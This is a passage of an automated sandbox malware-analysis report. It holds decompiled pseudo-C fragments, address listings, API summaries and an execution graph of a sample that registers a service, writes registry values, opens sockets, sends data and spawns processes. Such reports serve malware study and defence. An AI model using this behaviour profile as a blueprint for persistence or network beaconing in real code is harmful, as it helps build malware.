								E0040EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

































                                                                                0x00402f2e
                                                                                0x00402f34
                                                                                0x00402f36
                                                                                0x00402f3d
                                                                                0x00402f42
                                                                                0x00402f4d
                                                                                0x00402f88
                                                                                0x00402f8b
                                                                                0x00402f8e
                                                                                0x00402f93
                                                                                0x00402f93
                                                                                0x00402f96
                                                                                0x00402f98
                                                                                0x00402f9b
                                                                                0x00402f9e
                                                                                0x00402f9e
                                                                                0x00402fa0
                                                                                0x00402fa1
                                                                                0x00402fae
                                                                                0x00402fb3
                                                                                0x00402fb7
                                                                                0x00402fbe
                                                                                0x00402fc1
                                                                                0x00402fc3
                                                                                0x00402fc5
                                                                                0x00402fca
                                                                                0x00402fcd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402fcd
                                                                                0x00402fdb
                                                                                0x00402fe3
                                                                                0x00402fe8
                                                                                0x004030ad
                                                                                0x00000000
                                                                                0x004030af
                                                                                0x00402ff3
                                                                                0x00402ff4
                                                                                0x00402ff7
                                                                                0x00402ff9
                                                                                0x00402ffd
                                                                                0x00403001
                                                                                0x00403017
                                                                                0x0040301a
                                                                                0x00403021
                                                                                0x00403028
                                                                                0x0040302b
                                                                                0x0040302e
                                                                                0x00403031
                                                                                0x00403034
                                                                                0x00403034
                                                                                0x00403036
                                                                                0x00403037
                                                                                0x00403049
                                                                                0x00403051
                                                                                0x00403054
                                                                                0x00403057
                                                                                0x00403059
                                                                                0x0040305c
                                                                                0x0040305c
                                                                                0x0040305e
                                                                                0x0040305f
                                                                                0x0040306b
                                                                                0x00403070
                                                                                0x00403076
                                                                                0x00403079
                                                                                0x0040307c
                                                                                0x0040307c
                                                                                0x0040307e
                                                                                0x0040307f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403003
                                                                                0x00403003
                                                                                0x0040300d
                                                                                0x0040300f
                                                                                0x0040300f
                                                                                0x0040300f
                                                                                0x00403012
                                                                                0x00403013
                                                                                0x00000000
                                                                                0x00403083
                                                                                0x0040308f
                                                                                0x00403094
                                                                                0x0040309d
                                                                                0x004030a0
                                                                                0x004030a3
                                                                                0x004030a4
                                                                                0x00000000
                                                                                0x00402ff7
                                                                                0x00402f4f
                                                                                0x00402f4f
                                                                                0x00402f52
                                                                                0x00402f54
                                                                                0x00402f54
                                                                                0x00402f57
                                                                                0x00402f57
                                                                                0x00402f59
                                                                                0x00402f5a
                                                                                0x00402f66
                                                                                0x00402f6e
                                                                                0x00402f7a
                                                                                0x00000000
                                                                                0x00402f7a
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                  • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                • HeapFree.KERNEL32(00000000), ref: 00402F7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                • String ID:
                                                                                • API String ID: 1017166417-0
                                                                                • Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                • Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:14.6%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0.7%
                                                                                Total number of Nodes:1807
                                                                                Total number of Limit Nodes:18
                                                                                execution_graph 7599 124e92 GetTickCount 7600 124ec0 InterlockedExchange 7599->7600 7601 124ec9 7600->7601 7602 124ead GetTickCount 7600->7602 7602->7601 7603 124eb8 Sleep 7602->7603 7603->7600 8082 1243d2 8083 1243e0 8082->8083 8084 1243ef 8083->8084 8085 121940 4 API calls 8083->8085 8085->8084 7604 125d93 IsBadWritePtr 7605 125ddc 7604->7605 7606 125da8 7604->7606 7606->7605 7608 125389 7606->7608 7615 124bd1 GetTickCount 7608->7615 7612 1253ad 7613 124ae6 8 API calls 7612->7613 7614 125407 7612->7614 7613->7612 7614->7605 7616 124bff InterlockedExchange 7615->7616 7617 124c08 7616->7617 7618 124bec GetTickCount 7616->7618 7620 124ae6 7617->7620 7618->7617 7619 124bf7 Sleep 7618->7619 7619->7616 7621 124af3 7620->7621 7623 124b03 7620->7623 7622 12ebed 8 API calls 7621->7622 7622->7623 7623->7612 8086 125453 8091 12543a 8086->8091 8094 125048 8091->8094 8095 124bd1 4 API calls 8094->8095 8096 125056 8095->8096 8097 12ec2e codecvt 4 API calls 8096->8097 8098 12508b 8096->8098 8097->8098 8099 124ed3 8104 124c9a 8099->8104 8105 124cd8 8104->8105 8107 124ca9 8104->8107 8106 12ec2e codecvt 4 API calls 8106->8105 8107->8106 7624 126511 wsprintfA IsBadReadPtr 7625 12656a htonl htonl wsprintfA wsprintfA 7624->7625 7626 12674e 7624->7626 7630 1265f3 7625->7630 7627 12e318 23 API calls 7626->7627 7628 126753 ExitProcess 7627->7628 7629 12668a GetCurrentProcess StackWalk64 7629->7630 7631 1266a0 wsprintfA 7629->7631 7630->7629 7630->7631 7633 126652 wsprintfA 7630->7633 7632 1266ba 7631->7632 7634 126712 wsprintfA 7632->7634 7635 1266da wsprintfA 7632->7635 7636 1266ed wsprintfA 7632->7636 7633->7630 7637 12e8a1 30 API calls 7634->7637 7635->7636 7636->7632 7638 126739 7637->7638 7639 12e318 23 API calls 7638->7639 7640 126741 7639->7640 8108 128c51 8109 128c86 8108->8109 8110 128c5d 8108->8110 8111 128c8b lstrcmpA 8109->8111 8121 128c7b 8109->8121 8112 128c6e 8110->8112 8113 128c7d 8110->8113 8114 128c9e 8111->8114 8111->8121 8122 128be7 8112->8122 8130 128bb3 8113->8130 8115 128cad 8114->8115 8118 12ec2e codecvt 4 API calls 8114->8118 8120 12ebcc 4 API calls 8115->8120 8115->8121 8118->8115 8120->8121 8123 128bf2 8122->8123 8124 128c2a 8122->8124 8125 128bb3 6 API calls 8123->8125 8124->8121 8126 128bf8 8125->8126 8134 126410 8126->8134 8128 128c01 8128->8124 8149 126246 8128->8149 8131 128bbc 8130->8131 8132 128be4 8130->8132 8131->8132 8133 126246 6 API calls 8131->8133 8133->8132 8135 126421 8134->8135 8136 12641e 8134->8136 8137 12643a 8135->8137 8138 12643e VirtualAlloc 8135->8138 8136->8128 8137->8128 8139 126472 8138->8139 8140 12645b VirtualAlloc 8138->8140 8141 12ebcc 4 API calls 8139->8141 8140->8139 8148 1264fb 8140->8148 8142 126479 8141->8142 8142->8148 8159 126069 8142->8159 8145 1264da 8147 126246 6 API calls 8145->8147 8145->8148 8147->8148 8148->8128 8150 1262b3 8149->8150 8152 126252 8149->8152 8150->8124 8151 126297 8154 1262a0 VirtualFree 8151->8154 8155 1262ad 8151->8155 8152->8151 8153 12628f 8152->8153 8156 126281 FreeLibrary 8152->8156 8157 12ec2e codecvt 4 API calls 8153->8157 8154->8155 8158 12ec2e codecvt 4 API calls 8155->8158 8156->8152 8157->8151 8158->8150 8160 126090 IsBadReadPtr 8159->8160 8162 126089 8159->8162 8160->8162 8165 1260aa 8160->8165 8161 1260c0 LoadLibraryA 8161->8162 8161->8165 8162->8145 8169 125f3f 8162->8169 8163 12ebcc 4 API calls 8163->8165 8164 12ebed 8 API calls 8164->8165 8165->8161 8165->8162 8165->8163 8165->8164 8166 126191 IsBadReadPtr 8165->8166 8167 126141 GetProcAddress 8165->8167 8168 126155 GetProcAddress 8165->8168 8166->8162 8166->8165 8167->8165 8168->8165 8170 125fe6 8169->8170 8172 125f61 8169->8172 8170->8145 8171 125fbf VirtualProtect 8171->8170 8171->8172 8172->8170 8172->8171 7641 128314 7642 12675c 21 API calls 7641->7642 7643 128324 7642->7643 8173 12195b 8174 121971 8173->8174 8175 12196b 8173->8175 8176 12ec2e codecvt 4 API calls 8175->8176 8176->8174 7644 125099 7645 124bd1 4 API calls 7644->7645 7646 1250a2 7645->7646 7647 12f483 WSAStartup 7648 12f304 7651 12f26d setsockopt setsockopt setsockopt setsockopt setsockopt 7648->7651 7650 12f312 7651->7650 7652 125b84 IsBadWritePtr 7653 125b99 7652->7653 7654 125b9d 7652->7654 7655 124bd1 4 API calls 7654->7655 7656 125bcc 7655->7656 7659 125472 7656->7659 7678 124763 7659->7678 7661 125b58 7684 124699 7661->7684 7664 124763 lstrlenA 7665 125b6e 7664->7665 7705 124f9f 7665->7705 7667 125b79 7668 124ae6 8 API calls 7669 125549 lstrlenA 7668->7669 7677 12548a 7669->7677 7670 125472 13 API calls 7670->7677 7672 12558d lstrcpynA 7672->7677 7673 124ae6 8 API calls 7673->7677 7674 125a9f lstrcpyA 7674->7677 7675 125935 lstrcpynA 7675->7677 7676 1258e7 lstrcpyA 7676->7677 7677->7661 7677->7668 7677->7670 7677->7672 7677->7673 7677->7674 7677->7675 7677->7676 7682 12ef7c lstrlenA lstrlenA lstrlenA 7677->7682 7680 12477a 7678->7680 7679 124859 7679->7677 7680->7679 7681 12480d lstrlenA 7680->7681 7681->7680 7683 12efb4 7682->7683 7683->7677 7710 1245b3 7684->7710 7687 1245b3 7 API calls 7688 1246c6 7687->7688 7689 1245b3 7 API calls 7688->7689 7690 1246d8 7689->7690 7691 1245b3 7 API calls 7690->7691 7692 1246ea 7691->7692 7693 1245b3 7 API calls 7692->7693 7694 1246ff 7693->7694 7695 1245b3 7 API calls 7694->7695 7696 124711 7695->7696 7697 1245b3 7 API calls 7696->7697 7698 124723 7697->7698 7699 12ef7c 3 API calls 7698->7699 7700 124735 7699->7700 7701 12ef7c 3 API calls 7700->7701 7702 12474a 7701->7702 7703 12ef7c 3 API calls 7702->7703 7704 12475c 7703->7704 7704->7664 7706 124fac 7705->7706 7709 124fb0 7705->7709 7706->7667 7707 124ffd 7707->7667 7708 124fd5 IsBadCodePtr 7708->7709 7709->7707 7709->7708 7711 1245c1 7710->7711 7712 1245c8 7710->7712 7713 12ebcc 4 API calls 7711->7713 7714 12ebcc 4 API calls 7712->7714 7716 1245e1 7712->7716 7713->7712 7714->7716 7715 124691 7715->7687 7716->7715 7717 12ef7c 3 API calls 7716->7717 7717->7716 7718 125c05 IsBadWritePtr 7719 125c24 IsBadWritePtr 7718->7719 7726 125ca6 7718->7726 7720 125c32 7719->7720 7719->7726 7721 125c82 7720->7721 7722 124bd1 4 API calls 7720->7722 7723 124bd1 4 API calls 7721->7723 7722->7721 7724 125c90 7723->7724 7725 125472 18 API calls 7724->7725 7725->7726 7736 12448b 7737 124499 7736->7737 7738 1244ab 7737->7738 7740 121940 7737->7740 7741 12ec2e codecvt 4 API calls 7740->7741 7742 121949 7741->7742 7742->7738 8181 12e749 8182 12dd05 6 API calls 8181->8182 8183 12e751 8182->8183 8184 12e781 lstrcmpA 8183->8184 8185 12e799 8183->8185 8184->8183 7743 125e0d 7746 1250dc 7743->7746 7745 125e20 7747 124bd1 4 API calls 7746->7747 7748 1250f2 7747->7748 7749 124ae6 8 API calls 7748->7749 7755 1250ff 7749->7755 7750 125130 7752 124ae6 8 API calls 7750->7752 7751 124ae6 8 API calls 7753 125110 lstrcmpA 7751->7753 7754 125138 7752->7754 7753->7750 7753->7755 7757 12513e 7754->7757 7758 12516e 7754->7758 7759 124ae6 8 API calls 7754->7759 7755->7750 7755->7751 7756 124ae6 8 API calls 7755->7756 7756->7755 7757->7745 7758->7757 7761 124ae6 8 API calls 7758->7761 7760 12515e 7759->7760 7760->7758 7763 124ae6 8 API calls 7760->7763 7762 1251b6 7761->7762 7789 124a3d 7762->7789 7763->7758 7766 124ae6 8 API calls 7767 1251c7 7766->7767 7768 124ae6 8 API calls 7767->7768 7769 1251d7 7768->7769 7770 124ae6 8 API calls 7769->7770 7771 1251e7 7770->7771 7771->7757 7772 124ae6 8 API calls 7771->7772 7773 125219 7772->7773 7774 124ae6 8 API calls 7773->7774 7775 125227 7774->7775 7776 124ae6 8 API calls 7775->7776 7777 12524f lstrcpyA 7776->7777 7778 124ae6 8 API calls 7777->7778 7783 125263 7778->7783 7779 124ae6 8 API calls 7780 125315 7779->7780 7781 124ae6 8 API calls 7780->7781 7782 125323 7781->7782 7784 124ae6 8 API calls 7782->7784 7783->7779 7786 125331 7784->7786 7785 124ae6 8 API calls 7785->7786 7786->7757 7786->7785 7787 124ae6 8 API calls 7786->7787 7788 125351 lstrcmpA 7787->7788 7788->7757 7788->7786 7790 124a4a 7789->7790 7793 124a53 7789->7793 7791 12ebed 8 API calls 7790->7791 7791->7793 7792 124a78 7795 124aa3 7792->7795 7796 124a8e 7792->7796 7793->7792 7794 12ebed 8 API calls 7793->7794 7794->7792 7797 124a9b 7795->7797 7798 12ebed 8 API calls 7795->7798 7796->7797 7799 12ec2e codecvt 4 API calls 7796->7799 7797->7766 7798->7797 7799->7797 7800 124c0d 7801 124ae6 8 API calls 7800->7801 7802 124c17 7801->7802 8186 125e4d 8187 125048 8 API calls 8186->8187 8188 125e55 8187->8188 8189 125e64 8188->8189 8190 121940 4 API calls 8188->8190 8190->8189 7803 12be31 lstrcmpiA 7804 12be55 lstrcmpiA 7803->7804 7810 12be71 7803->7810 7805 12be61 lstrcmpiA 7804->7805 7804->7810 7805->7810 7815 12bfc8 7805->7815 7806 12bf62 lstrcmpiA 7807 12bf70 7806->7807 7808 12bf77 lstrcmpiA 7806->7808 7811 12bfc2 7807->7811 7813 12ec2e codecvt 4 API calls 7807->7813 7807->7815 7808->7807 7809 12bf8c lstrcmpiA 7808->7809 7809->7807 7810->7806 7814 12ebcc 4 API calls 7810->7814 7812 12ec2e codecvt 4 API calls 7811->7812 7812->7815 7813->7807 7818 12beb6 7814->7818 7816 12bf5a 7816->7806 7817 12ebcc 4 API calls 7817->7818 7818->7806 7818->7815 7818->7816 7818->7817 7819 125d34 IsBadWritePtr 7820 125d47 7819->7820 7821 125d4a 7819->7821 7822 125389 12 API calls 7821->7822 7823 125d80 7822->7823 7824 12b535 7825 12b566 7824->7825 7826 12ebcc 4 API calls 7825->7826 7827 12b587 7826->7827 7828 12ebcc 4 API calls 7827->7828 7840 12b590 7828->7840 7829 12bdcd InterlockedDecrement 7830 12bde2 7829->7830 7832 12ec2e codecvt 4 API calls 7830->7832 7833 12bdea 7832->7833 7834 12ec2e codecvt 4 API calls 7833->7834 7836 12bdf2 7834->7836 7835 12bdb7 Sleep 7835->7840 7837 12be05 7836->7837 7839 12ec2e codecvt 4 API calls 7836->7839 7838 12bdcc 7838->7829 7839->7837 7840->7829 7840->7835 7840->7838 7841 12ebed 8 API calls 7840->7841 7844 12b6b6 lstrlenA 7840->7844 7845 1230b5 2 API calls 7840->7845 7846 12b6ed lstrcpyA 7840->7846 7847 12e819 11 API calls 7840->7847 7850 12b731 lstrlenA 7840->7850 7851 12b71f lstrcmpA 7840->7851 7852 12b772 GetTickCount 7840->7852 7853 12bd49 InterlockedIncrement 7840->7853 7856 12bc5b InterlockedIncrement 7840->7856 7857 12b7ce InterlockedIncrement 7840->7857 7860 12b912 GetTickCount 7840->7860 7861 12b826 InterlockedIncrement 7840->7861 7862 12b932 GetTickCount 7840->7862 7863 12bcdc closesocket 7840->7863 7865 1238f0 6 API calls 7840->7865 7867 12ab81 lstrcpynA InterlockedIncrement 7840->7867 7870 12bba6 InterlockedIncrement 7840->7870 7872 12bc4c closesocket 7840->7872 7874 125ce1 22 API calls 7840->7874 7875 12ba71 wsprintfA 7840->7875 7877 12a7c1 22 API calls 7840->7877 7878 12ef1e lstrlenA 7840->7878 7879 125ded 12 API calls 7840->7879 7880 12a688 GetTickCount 7840->7880 7881 123e10 7840->7881 7884 123e4f 7840->7884 7887 12384f 7840->7887 7907 12a7a3 inet_ntoa 7840->7907 7914 12abee 7840->7914 7926 121feb GetTickCount 7840->7926 7947 123cfb 7840->7947 7950 12b3c5 7840->7950 7981 12ab81 7840->7981 7841->7840 7844->7840 7845->7840 7899 125ce1 7846->7899 7847->7840 7850->7840 7851->7840 7851->7850 7852->7840 7993 12a628 7853->7993 7856->7840 7909 12acd7 7857->7909 7860->7840 7861->7852 7862->7840 7864 12bc6d InterlockedIncrement 7862->7864 7863->7840 7864->7840 7865->7840 7867->7840 7870->7840 7872->7840 7874->7840 7927 12a7c1 7875->7927 7877->7840 7878->7840 7879->7840 7880->7840 7882 1230fa 4 API calls 7881->7882 7883 123e1d 7882->7883 7883->7840 7885 1230fa 4 API calls 7884->7885 7886 123e5c 7885->7886 7886->7840 7888 1230fa 4 API calls 7887->7888 7889 123863 7888->7889 7890 1238b9 7889->7890 7891 123889 7889->7891 7898 1238b2 7889->7898 8002 1235f9 7890->8002 7996 123718 7891->7996 7896 123718 6 API calls 7896->7898 7897 1235f9 6 API calls 7897->7898 7898->7840 7900 125cf4 7899->7900 7901 125cec 7899->7901 7903 124bd1 4 API calls 7900->7903 7902 124bd1 4 API calls 7901->7902 7902->7900 7904 125d02 7903->7904 7905 125472 18 API calls 7904->7905 7906 125d1c 7905->7906 7906->7840 7908 12a7b9 7907->7908 7908->7840 7910 12f315 14 API calls 7909->7910 7911 12aceb 7910->7911 7912 12acff 7911->7912 7913 12f315 14 API calls 7911->7913 7912->7840 7913->7912 7915 12abfb 7914->7915 7919 12ac65 7915->7919 8008 122f22 7915->8008 7917 12ac23 7917->7919 7923 122684 2 API calls 7917->7923 7918 12f315 14 API calls 7918->7919 7919->7918 7920 12ac6f 7919->7920 7925 12ac8a 7919->7925 7921 12ab81 2 API calls 7920->7921 7922 12ac81 7921->7922 8016 1238f0 7922->8016 7923->7917 7925->7840 7926->7840 7928 12a7df 7927->7928 7929 12a87d lstrlenA send 7927->7929 7928->7929 7936 12a7fa wsprintfA 7928->7936 7937 12a80a 7928->7937 7939 12a8f2 7928->7939 7930 12a899 7929->7930 7931 12a8bf 7929->7931 7932 12a8a5 wsprintfA 7930->7932 7940 12a89e 7930->7940 7933 12a8c4 send 7931->7933 7931->7939 7932->7940 7935 12a8d8 wsprintfA 7933->7935 7933->7939 7934 12a978 recv 7934->7939 7941 12a982 7934->7941 7935->7940 7936->7937 7937->7929 7938 12a9b0 wsprintfA 7938->7940 7939->7934 7939->7938 7939->7941 7940->7840 7941->7940 7942 1230b5 2 API calls 7941->7942 7943 12ab05 7942->7943 7944 12e819 11 API calls 7943->7944 7945 12ab17 7944->7945 7946 12a7a3 inet_ntoa 7945->7946 7946->7940 7948 1230fa 4 API calls 7947->7948 7949 123d0b 7948->7949 7949->7840 7951 125ce1 22 API calls 7950->7951 7952 12b3e6 7951->7952 7953 125ce1 22 API calls 7952->7953 7954 12b404 7953->7954 7956 12ef7c 3 API calls 7954->7956 7962 12b440 7954->7962 7955 12ef7c 3 API calls 7957 12b458 wsprintfA 7955->7957 7958 12b42b 7956->7958 7959 12ef7c 3 API calls 7957->7959 7960 12ef7c 3 API calls 7958->7960 7961 12b480 7959->7961 7960->7962 7963 12ef7c 3 API calls 7961->7963 7962->7955 7964 12b493 7963->7964 7965 12ef7c 3 API calls 7964->7965 7966 12b4bb 7965->7966 8023 12ad89 GetLocalTime SystemTimeToFileTime 7966->8023 7970 12b4cc 7971 12ef7c 3 API calls 7970->7971 7972 12b4dd 7971->7972 7973 12b211 7 API calls 7972->7973 7974 12b4ec 7973->7974 7975 12ef7c 3 API calls 7974->7975 7976 12b4fd 7975->7976 7977 12b211 7 API calls 7976->7977 7978 12b509 7977->7978 7979 12ef7c 3 API calls 7978->7979 7980 12b51a 7979->7980 7980->7840 7982 12abe9 GetTickCount 7981->7982 7984 12ab8c 7981->7984 7986 12a51d 7982->7986 7983 12aba8 lstrcpynA 7983->7984 7984->7982 7984->7983 7985 12abe1 InterlockedIncrement 7984->7985 7985->7984 7987 12a4c7 4 API calls 7986->7987 7988 12a52c 7987->7988 7989 12a542 GetTickCount 7988->7989 7991 12a539 GetTickCount 7988->7991 7989->7991 7992 12a56c 7991->7992 7992->7840 7994 12a4c7 4 API calls 7993->7994 7995 12a633 7994->7995 7995->7840 7997 12f04e 4 API calls 7996->7997 7999 12372a 7997->7999 7998 123847 7998->7896 7998->7898 7999->7998 8000 1237b3 GetCurrentThreadId 7999->8000 8000->7999 8001 1237c8 GetCurrentThreadId 8000->8001 8001->7999 8003 12f04e 4 API calls 8002->8003 8004 12360c 8003->8004 8005 1236da GetCurrentThreadId 8004->8005 8006 1236f1 8004->8006 8005->8006 8007 1236e5 GetCurrentThreadId 8005->8007 8006->7897 8006->7898 8007->8006 8009 122d21 7 API calls 8008->8009 8010 122f3d 8009->8010 8012 122f85 8010->8012 8013 122f4f 8010->8013 8015 122f44 8010->8015 8011 122fcf GetProcessHeap HeapFree 8011->8015 8012->8011 8012->8012 8014 122f6b GetProcessHeap HeapFree 8013->8014 8014->8015 8015->7917 8017 123900 8016->8017 8018 123980 8016->8018 8019 1230fa 4 API calls 8017->8019 8018->7925 8022 12390a 8019->8022 8020 12391b GetCurrentThreadId 8020->8022 8021 123939 GetCurrentThreadId 8021->8022 8022->8018 8022->8020 8022->8021 8024 12adbf 8023->8024 8048 12ad08 gethostname 8024->8048 8027 1230b5 2 API calls 8028 12add3 8027->8028 8029 12a7a3 inet_ntoa 8028->8029 8031 12ade4 8028->8031 8029->8031 8030 12ae85 wsprintfA 8032 12ef7c 3 API calls 8030->8032 8031->8030 8033 12ae36 wsprintfA wsprintfA 8031->8033 8034 12aebb 8032->8034 8035 12ef7c 3 API calls 8033->8035 8036 12ef7c 3 API calls 8034->8036 8035->8031 8037 12aed2 8036->8037 8038 12b211 8037->8038 8039 12b2bb FileTimeToLocalFileTime FileTimeToSystemTime 8038->8039 8040 12b2af GetLocalTime 8038->8040 8041 12b2d2 8039->8041 8040->8041 8042 12b2d9 SystemTimeToFileTime 8041->8042 8043 12b31c GetTimeZoneInformation 8041->8043 8044 12b2ec 8042->8044 8045 12b33a wsprintfA 8043->8045 8046 12b312 FileTimeToSystemTime 8044->8046 8045->7970 8046->8043 8049 12ad71 8048->8049 8054 12ad26 lstrlenA 8048->8054 8051 12ad85 8049->8051 8052 12ad79 lstrcpyA 8049->8052 8051->8027 8052->8051 8053 12ad68 lstrlenA 8053->8049 8054->8049 8054->8053 8207 124960 8208 12496d 8207->8208 8210 12497d 8207->8210 8209 12ebed 8 API calls 8208->8209 8209->8210 8055 125e21 8056 125e36 8055->8056 8057 125e29 8055->8057 8058 1250dc 17 API calls 8057->8058 8058->8056 8211 124861 IsBadWritePtr 8212 124876 8211->8212 8213 129961 RegisterServiceCtrlHandlerA 8214 12997d 8213->8214 8221 1299cb 8213->8221 8223 129892 8214->8223 8216 12999a 8217 1299ba 8216->8217 8218 129892 SetServiceStatus 8216->8218 8219 129892 SetServiceStatus 8217->8219 8217->8221 8220 1299aa 8218->8220 8219->8221 8220->8217 8222 1298f2 41 API calls 8220->8222 8222->8217 8224 1298c2 SetServiceStatus 8223->8224 8224->8216 8059 1235a5 8060 1230fa 4 API calls 8059->8060 8061 1235b3 8060->8061 8065 1235ea 8061->8065 8066 12355d 8061->8066 8063 1235da 8064 12355d 4 API calls 8063->8064 8063->8065 8064->8065 8067 12f04e 4 API calls 8066->8067 8068 12356a 8067->8068 8068->8063 6125 129a6b SetErrorMode SetErrorMode SetUnhandledExceptionFilter 6241 12ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 6125->6241 6127 129a95 6128 129aa3 GetModuleHandleA GetModuleFileNameA 6127->6128 6133 12a3cc 6127->6133 6142 129ac4 6128->6142 6129 12a41c CreateThread WSAStartup 6242 12e52e 6129->6242 7317 12405e CreateEventA 6129->7317 6131 129afd GetCommandLineA 6140 129b22 6131->6140 6132 12a406 DeleteFileA 6132->6133 6134 12a40d 6132->6134 6133->6129 6133->6132 6133->6134 6137 12a3ed GetLastError 6133->6137 6134->6129 6135 12a445 6261 12eaaf 6135->6261 6137->6134 6139 12a3f8 Sleep 6137->6139 6138 12a44d 6265 121d96 6138->6265 6139->6132 6145 129c0c 6140->6145 6151 129b47 6140->6151 6142->6131 6143 12a457 6313 1280c9 6143->6313 6505 1296aa 6145->6505 6156 129b96 lstrlenA 6151->6156 6161 129b58 6151->6161 6152 12a1d2 6162 12a1e3 GetCommandLineA 6152->6162 6153 129c39 6157 12a167 GetModuleHandleA GetModuleFileNameA 6153->6157 6511 124280 CreateEventA 6153->6511 6156->6161 6159 129c05 ExitProcess 6157->6159 6160 12a189 6157->6160 6160->6159 6169 12a1b2 GetDriveTypeA 6160->6169 6161->6159 6464 12675c 6161->6464 6171 12a205 6162->6171 6169->6159 6173 12a1c5 6169->6173 6191 12a285 lstrlenA 6171->6191 6202 12a239 6171->6202 6172 12a491 6177 12a49f GetTickCount 6172->6177 6180 12a4be Sleep 6172->6180 6187 12a4b7 GetTickCount 6172->6187 6360 12c913 6172->6360 6612 129145 GetModuleHandleA GetModuleFileNameA CharToOemA 6173->6612 6174 12675c 21 API calls 6178 129c79 6174->6178 6177->6172 6177->6180 6178->6157 6182 129ca0 GetTempPathA 6178->6182 6183 129e3e 6178->6183 6179 129bff 6179->6159 6180->6172 6182->6183 6184 129cba 6182->6184 6190 129e6b GetEnvironmentVariableA 6183->6190 6192 129e04 6183->6192 6537 1299d2 lstrcpyA 6184->6537 6187->6180 6190->6192 6193 129e7d 6190->6193 6191->6202 6607 12ec2e 6192->6607 6194 1299d2 16 API calls 6193->6194 6196 129e9d 6194->6196 6196->6192 6200 129eb0 lstrcpyA lstrlenA 6196->6200 6197 129d5f 6551 126cc9 6197->6551 6199 12a3c2 6624 1298f2 6199->6624 6201 129ef4 6200->6201 6205 126dc2 6 API calls 6201->6205 6209 129f03 6201->6209 6202->6202 6620 126ec3 6202->6620 6205->6209 6206 12a39d StartServiceCtrlDispatcherA 6206->6199 6207 129d72 lstrcpyA lstrcatA lstrcatA 6210 129cf6 6207->6210 6208 12a3c7 6208->6133 6211 129f32 RegOpenKeyExA 6209->6211 6560 129326 6210->6560 6213 129f48 RegSetValueExA RegCloseKey 6211->6213 6216 129f70 6211->6216 6212 12a35f 6212->6199 6212->6206 6213->6216 6221 129f9d GetModuleHandleA GetModuleFileNameA 6216->6221 6217 129e0c DeleteFileA 6217->6183 6218 129dde GetFileAttributesExA 6218->6217 6220 129df7 6218->6220 6220->6192 6597 1296ff 6220->6597 6223 129fc2 6221->6223 6224 12a093 6221->6224 6223->6224 6230 129ff1 GetDriveTypeA 6223->6230 6225 12a103 CreateProcessA 6224->6225 6226 12a0a4 wsprintfA 6224->6226 6227 12a13a 6225->6227 6228 12a12a DeleteFileA 6225->6228 6603 122544 6226->6603 6227->6192 6234 1296ff 3 API calls 6227->6234 6228->6227 6230->6224 6232 12a00d 6230->6232 6236 12a02d lstrcatA 6232->6236 6234->6192 6237 12a046 6236->6237 6238 12a052 lstrcatA 6237->6238 6239 12a064 lstrcatA 6237->6239 6238->6239 6239->6224 6240 12a081 lstrcatA 6239->6240 6240->6224 6241->6127 6631 12dd05 GetTickCount 6242->6631 6244 12e538 6639 12dbcf 6244->6639 6246 12e544 6247 12e555 GetFileSize 6246->6247 6252 12e5b8 6246->6252 6248 12e5b1 CloseHandle 6247->6248 6249 12e566 6247->6249 6248->6252 6663 12db2e 6249->6663 6649 12e3ca RegOpenKeyExA 6252->6649 6253 12e576 ReadFile 6253->6248 6254 12e58d 6253->6254 6667 12e332 6254->6667 6257 12e5f2 6259 12e3ca 19 API calls 6257->6259 6260 12e629 6257->6260 6259->6260 6260->6135 6262 12eabe 6261->6262 6264 12eaba 6261->6264 6263 12dd05 6 API calls 6262->6263 6262->6264 6263->6264 6264->6138 6266 12ee2a 6265->6266 6267 121db4 GetVersionExA 6266->6267 6268 121dd0 GetSystemInfo GetModuleHandleA GetProcAddress 6267->6268 6270 121e16 GetCurrentProcess 6268->6270 6271 121e24 6268->6271 6270->6271 6725 12e819 6271->6725 6273 121e3d 6274 12e819 11 